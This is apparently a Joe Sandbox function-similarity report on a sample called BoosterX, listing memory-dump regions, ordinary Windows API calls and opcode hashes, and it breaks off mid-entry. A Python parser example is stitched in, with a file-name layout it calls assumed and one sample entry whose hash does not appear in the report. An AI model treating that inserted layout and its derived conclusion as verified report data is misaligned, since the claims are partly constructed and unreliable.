• Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
• Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
Similarity
• API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
• String ID:
• API String ID: 1203560049-0
• Opcode ID: 7118c4e6fffe30651da94a39ba5f8c81167afa32e221d2e2d046fdc79b46f602
• Instruction ID: 7c81f61912ac44e07130a16d47c55f6ae0ba8310532eacf40dedfb905e7d2a39
• Opcode Fuzzy Hash: 7118c4e6fffe30651da94a39ba5f8c81167afa32e221d2e2d046fdc79b46f602
• Instruction Fuzzy Hash: 80214122A1868392EA109F29E4451296361FBC9BA5F640331EADDC7BD9DF3CD5458704
APIs
Memory Dump Source
• Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
• Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: 8918d945bc68b986d9b4f63ac5cfb24cb8c1f3a7e8295ea6f783a439b1dda531
• Instruction ID: 97c26f8e828b792dfcf5be8af7f7aa3a408e06ee848f330468afd85e58e2baa4
• Opcode Fuzzy Hash: 8918d945bc68b986d9b4f63ac5cfb24cb8c1f3a7e8295ea6f783a439b1dda531
• Instruction Fuzzy Hash: 28E04F24B0430762FB546F319C913792362AFC8B43F00457ACD8EC3396CF3DA4098A00
APIs
• _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6C035F8A5
• _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6C035F8AB
  • Part of subcall function 00007FF6C0363E88: FindClose.KERNELBASE(?,?,00000000,00007FF6C0370791), ref: 00007FF6C0363EBD
Memory Dump Source
• Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
• Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
Similarity
• API ID: _invalid_parameter_noinfo_noreturn$CloseFind
• String ID:
• API String ID: 3587649625-0
• Opcode ID: 62888dbb9578cb0920daab953437093b21304736e7245625db1b85e939e2aa0d
• Instruction ID: a7ca68d242a45111bea642c57611d633a41ee274eceb027551dbcd5b6cc3ee2c
• Opcode Fuzzy Hash: 62888dbb9578cb0920daab953437093b21304736e7245625db1b85e939e2aa0d
• Instruction Fuzzy Hash: 0B919D37A18A92A4EB10DF24D8442AD7361FB84799F904236EA8CC7BE9DF7CD585C300
APIs
Memory Dump Source
• Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
• Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
Similarity
• API ID: _invalid_parameter_noinfo_noreturn
• String ID:
• API String ID: 3668304517-0
• Opcode ID: 7a253c8ca56257a91ac06a853ed35445757fd21c51e01c3a38e6e0cb422338a9
• Instruction ID: d27342526f2900655031530a10f02910cf97fb94efd4c9329c00ea38859e8958
• Opcode Fuzzy Hash: 7a253c8ca56257a91ac06a853ed35445757fd21c51e01c3a38e6e0cb422338a9
• Instruction Fuzzy Hash: 3041C162F18657A4FB009FB5D4402AD3321AF45B99F141236DE9DEBBAADF38D0828300
APIs
• SetFilePointer.KERNELBASE(00000000,00000002,?,00000F99,?,00007FF6C036270D), ref: 00007FF6C0362869
• GetLastError.KERNEL32(?,00007FF6C036270D), ref: 00007FF6C0362878
Memory Dump Source
• Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
• Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
Similarity
• API ID: ErrorFileLastPointer
• String ID:
• API String ID: 2976181284-0
• Opcode ID: 15a0c32312994542f24a0a355b1d122a2bfdb3c55d25b91561185cfc545188a1
• Instruction ID: 25c9b8de0f5a129c1d364fbd9ec8ccefea22f71ec75521a29f1af8f290a8df4e
• Opcode Fuzzy Hash: 15a0c32312994542f24a0a355b1d122a2bfdb3c55d25b91561185cfc545188a1
• Instruction Fuzzy Hash: 6831C332B19E43A6EA604F2AD940AF92350BF45BD6F151131DF9DC77A1DF3CE4828644
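The function entries in this section (API references such as SetFilePointer.KERNELBASE and GetLastError.KERNEL32 with their ref addresses, the .sdmp memory-dump region names, and the Similarity IDs) follow a fixed layout that is easy to mine when triaging a sample. The following Python is an added example, not code from Joe Sandbox or from this report: it parses such entries into records, decodes base address, page protection and region type from the .sdmp names, finds functions that share an API String ID (same API footprint compiled into different code, worth diffing in IDA), and lists the regions whose protection is executable, which are the ones to load for disassembly. The field layout of the .sdmp names is an assumption inferred from the names on this page; the PAGE_* and MEM_* values are the winnt.h constants. The sample text is constructed from abbreviated entries on this page.

```python
"""Parse Joe Sandbox function-similarity entries ('APIs' / 'Memory Dump Source' /
'Similarity' blocks) into records for triage. Added example, not Joe Sandbox code."""
import re
from collections import defaultdict

# winnt.h constants (facts): page protection and region type.
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x10: "PAGE_EXECUTE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# ASSUMED .sdmp name layout, inferred from the names on this page, not documented here:
#   <proc idx>.<cycle>.<timestamp>.<base addr>.<protection>.<state>.<region type>.<module idx>.sdmp
API_RE = re.compile(r"^•\s*(?:Part of subcall function ([0-9A-F]+):\s*)?"
                    r"(\S+?)\.([A-Za-z0-9]+)(?:\((.*?)\))?,?\s+ref:\s+([0-9A-F]+)$")
KV_RE = re.compile(r"^•\s*([^:]+):\s*(.*)$")

def parse_sdmp_name(name):
    """Decode base address, protection and region type from an .sdmp file name."""
    name = name.replace("Download File", "").strip()  # HTML export appends a link label
    parts = name.removesuffix(".sdmp").split(".")
    if len(parts) != 8:
        raise ValueError(f"unexpected sdmp name: {name}")
    return {"name": name, "base": int(parts[3], 16),
            "protect": PAGE_PROTECT.get(int(parts[4], 16), parts[4]),
            "type": MEM_TYPE.get(int(parts[6], 16), parts[6])}

def parse_entries(text):
    """One dict per function; a new entry starts at each 'APIs' header."""
    entries, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = {"apis": [], "associated": []}
            entries.append(cur)
        elif cur is None or not line.startswith("•"):
            continue
        elif m := API_RE.match(line):
            caller, api, module, args, ref = m.groups()
            cur["apis"].append({"api": api, "module": module, "ref": int(ref, 16),
                                "args": args.split(",") if args else [],
                                "subcall_of": int(caller, 16) if caller else None})
        elif m := KV_RE.match(line):
            key, val = m.groups()
            if key == "Source File":
                cur["source"] = parse_sdmp_name(val.split(",")[0])
            elif key == "Associated":
                cur["associated"].append(parse_sdmp_name(val))
            else:
                cur[key] = val
    return entries

def duplicates_by_api_string_id(entries):
    """API String IDs shared by several functions: same API footprint, distinct opcodes."""
    groups = defaultdict(list)
    for e in entries:
        groups[e.get("API String ID")].append(e.get("Opcode ID"))
    return {k: v for k, v in groups.items() if len(v) > 1}

def executable_regions(entries):
    """Dump regions with PAGE_EXECUTE_* protection: the ones that hold code."""
    seen = {}
    for e in entries:
        for r in [e.get("source")] + e["associated"]:
            if r and r["protect"].startswith("PAGE_EXECUTE"):
                seen[r["name"]] = r
    return sorted(seen.values(), key=lambda r: r["base"])

# Constructed sample: four abbreviated entries copied from this report.
SAMPLE = """\
APIs
• _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6C035F8A5
  • Part of subcall function 00007FF6C0363E88: FindClose.KERNELBASE(?,?,00000000,00007FF6C0370791), ref: 00007FF6C0363EBD
• Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
• Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
• API ID: _invalid_parameter_noinfo_noreturn$CloseFind
• API String ID: 3587649625-0
• Opcode ID: 62888dbb9578cb0920daab953437093b21304736e7245625db1b85e939e2aa0d
APIs
• SetFilePointer.KERNELBASE(00000000,00000002,?,00000F99,?,00007FF6C036270D), ref: 00007FF6C0362869
• GetLastError.KERNEL32(?,00007FF6C036270D), ref: 00007FF6C0362878
• Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
• API ID: ErrorFileLastPointer
• API String ID: 2976181284-0
• Opcode ID: 15a0c32312994542f24a0a355b1d122a2bfdb3c55d25b91561185cfc545188a1
APIs
• Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
• API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
• API String ID: 1203560049-0
• Opcode ID: 78a323c9e83038540e709c0a306e8d1f319ba5efdf3dbb668891aceacb5d3961
APIs
• Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
• API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
• API String ID: 1203560049-0
• Opcode ID: 7118c4e6fffe30651da94a39ba5f8c81167afa32e221d2e2d046fdc79b46f602
"""

if __name__ == "__main__":
    found = parse_entries(SAMPLE)
    print(duplicates_by_api_string_id(found))
    print([hex(r["base"]) for r in executable_regions(found)])
```

On the page's own data the two AttributesFile$_invalid_parameter_noinfo_noreturn entries share API String ID 1203560049-0 but carry different Opcode IDs, and only the 00007FF6C0351000 region is PAGE_EXECUTE_READ; the other regions are read-only or read-write data of the same MEM_IMAGE module.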
APIs
Memory Dump Source
• Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
• Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
Similarity
• API ID: Item_invalid_parameter_noinfo_noreturn
• String ID:
• API String ID: 1746051919-0
• Opcode ID: 027ba0142be683b64c9b7682b90d490a759d47b8c79e38c26879436e42653007
• Instruction ID: 55c50d824ddf65bb4fef5f319144921c7146f917101a98407054bf3484d1e7d6
• Opcode Fuzzy Hash: 027ba0142be683b64c9b7682b90d490a759d47b8c79e38c26879436e42653007
• Instruction Fuzzy Hash: 4131B026A18783A2EA149F15E44536E7361EF85B95F544232EBDCC7BA5DF3CE180C704
APIs
Memory Dump Source
• Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
• Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
Similarity
• API ID: File$BuffersFlushTime
• String ID:
• API String ID: 1392018926-0
• Opcode ID: e2360d92fa371ec3cf3789b724fac7dc0eee746b57302bb10420cb3d80e8e918
• Instruction ID: 9a89c672f1c266d0169816fb5b30835f36890fbd4658a6d77d6f5be0778d202a
• Opcode Fuzzy Hash: e2360d92fa371ec3cf3789b724fac7dc0eee746b57302bb10420cb3d80e8e918
• Instruction Fuzzy Hash: 5E219C22E0AB4775EA718E91E5013BA6790BF41796F168431DF8CC6391EF7DD48AC204
APIs
Memory Dump Source
• Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
• Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
Similarity
• API ID: LoadString
• String ID:
• API String ID: 2948472770-0
• Opcode ID: 50b4215183bbe14799031b3cc2031c8d40844f06fe2ec6e88c7f343e0a5df25c
• Instruction ID: d0e3e37d10a8b8e16fa992e1eb80be4c38f6503cc9879a0cdd4eb2eb5152dbad
• Opcode Fuzzy Hash: 50b4215183bbe14799031b3cc2031c8d40844f06fe2ec6e88c7f343e0a5df25c
• Instruction Fuzzy Hash: 4F115871B08B4296EB009F16E884169B7A1BB89FC6F544439CA8DE3725DF7CE5418748
APIs
Memory Dump Source
• Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
• Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
Similarity
• API ID: ErrorFileLastPointer
• String ID:
• API String ID: 2976181284-0
• Opcode ID: b516d334dd1c85efa09aca89d3d43d2e2cc6a6d2d54fdbc8055284d5c2cf1125
• Instruction ID: 09168fd3767ecd97a9dcb1bee473c7576babe0917f58300e378b0b3cb7546e4e
• Opcode Fuzzy Hash: b516d334dd1c85efa09aca89d3d43d2e2cc6a6d2d54fdbc8055284d5c2cf1125
• Instruction Fuzzy Hash: F1119A21A18A43A1FB608F25E4816A97760FB84BA6F554332DBADD73E5CF3DD486C304
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: ItemRectTextWindow$Clientswprintf
                                                    • String ID:
                                                    • API String ID: 3322643685-0
                                                    • Opcode ID: b1e1e049dd5e2ad137b0382b0bc9e4d843d915bd339b20a0dba0486b348c3455
                                                    • Instruction ID: 5ab3c9c486fdb9b771379ec54c3dd5db04bd57b899a600e3d0c09bd72ca9dfac
                                                    • Opcode Fuzzy Hash: b1e1e049dd5e2ad137b0382b0bc9e4d843d915bd339b20a0dba0486b348c3455
                                                    • Instruction Fuzzy Hash: B4017124A0D64B61FF595F52A458279A391AF8774AF080434EDCDC63EAEF6CE984C304
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6C036EB29,?,?,?,?,00007FF6C0365712,?,?,?,00007FF6C036569E), ref: 00007FF6C036EAD8
                                                    • GetProcessAffinityMask.KERNEL32 ref: 00007FF6C036EAEB
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: Process$AffinityCurrentMask
                                                    • String ID:
                                                    • API String ID: 1231390398-0
                                                    • Opcode ID: 79722ee71258bf1dae4358653295d549d31541bd73e3f7913cc80f15ba5fc09c
                                                    • Instruction ID: fb5ba4b683e99d7149ba9b99270e59f81d54bade6e3f46bd95d86f665623af63
                                                    • Opcode Fuzzy Hash: 79722ee71258bf1dae4358653295d549d31541bd73e3f7913cc80f15ba5fc09c
                                                    • Instruction Fuzzy Hash: BCE02B61F1858792DF088F55D4414E96391FFC8B41B848036D54FC3714DF2CE54D8B00
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
                                                    • String ID:
                                                    • API String ID: 1173176844-0
                                                    • Opcode ID: 1bb7e24e02d919eeb5b6f2c6636e471bde2a2032dbf585f53a3051670f130e73
                                                    • Instruction ID: 17c431d6a22654abd66f4d7c6f1708c41ed1e910371629c891496cbb430238e4
                                                    • Opcode Fuzzy Hash: 1bb7e24e02d919eeb5b6f2c6636e471bde2a2032dbf585f53a3051670f130e73
                                                    • Instruction Fuzzy Hash: 1EE0EC40E1950B35FD182E6118691B500500F587B2F681BF3DFBDC83D7AF1CA5628118
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 485612231-0
                                                    • Opcode ID: d6a2b49c909fc4b479ef785cefb012946a1a1cb3df5903558656f65a622c367e
                                                    • Instruction ID: 1ce3be04a738200bd6cf19a92b1fc6ad28e8c6364dd5c8621f305915693cc6c9
                                                    • Opcode Fuzzy Hash: d6a2b49c909fc4b479ef785cefb012946a1a1cb3df5903558656f65a622c367e
                                                    • Instruction Fuzzy Hash: 58E0EC50E09643A6FF5AAFF2A8451B813D19F94B57F084177C98DC7391EF2CA4868600
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 3668304517-0
                                                    • Opcode ID: 00581cda7c60666db16e18db7aade68d96d0221c5bdb1fc775c713f5809bd176
                                                    • Instruction ID: 7a200e8fbd88cd2cf995d1692166fae08b190655f2998eea0775a3959f5239f9
                                                    • Opcode Fuzzy Hash: 00581cda7c60666db16e18db7aade68d96d0221c5bdb1fc775c713f5809bd176
                                                    • Instruction Fuzzy Hash: 82D1B46AB0C68B76EB288F2595802B977A1FB45B86F040435DF9DCB7B1CF38E4658700
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 3668304517-0
                                                    • Opcode ID: bb382b1398f5ed301b51dcc9be6bbe705c3f4ace3879a963b5b237ae590ad562
                                                    • Instruction ID: d5120e4f8e649da19d93df482b8a9cda2a155c85151459f2b279b00338297252
                                                    • Opcode Fuzzy Hash: bb382b1398f5ed301b51dcc9be6bbe705c3f4ace3879a963b5b237ae590ad562
                                                    • Instruction Fuzzy Hash: 57917062F24A13E8FB10CF68D9851AC2771AB40769F55063ADE9DD2BD9DF38D586C300
                                                    APIs
                                                      • Part of subcall function 00007FF6C036E8C4: ReleaseSemaphore.KERNEL32 ref: 00007FF6C036E8F0
                                                      • Part of subcall function 00007FF6C036E8C4: CloseHandle.KERNELBASE ref: 00007FF6C036E90F
                                                      • Part of subcall function 00007FF6C036E8C4: DeleteCriticalSection.KERNEL32 ref: 00007FF6C036E926
                                                      • Part of subcall function 00007FF6C036E8C4: CloseHandle.KERNEL32 ref: 00007FF6C036E933
                                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6C0371A4B
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmpDownload File
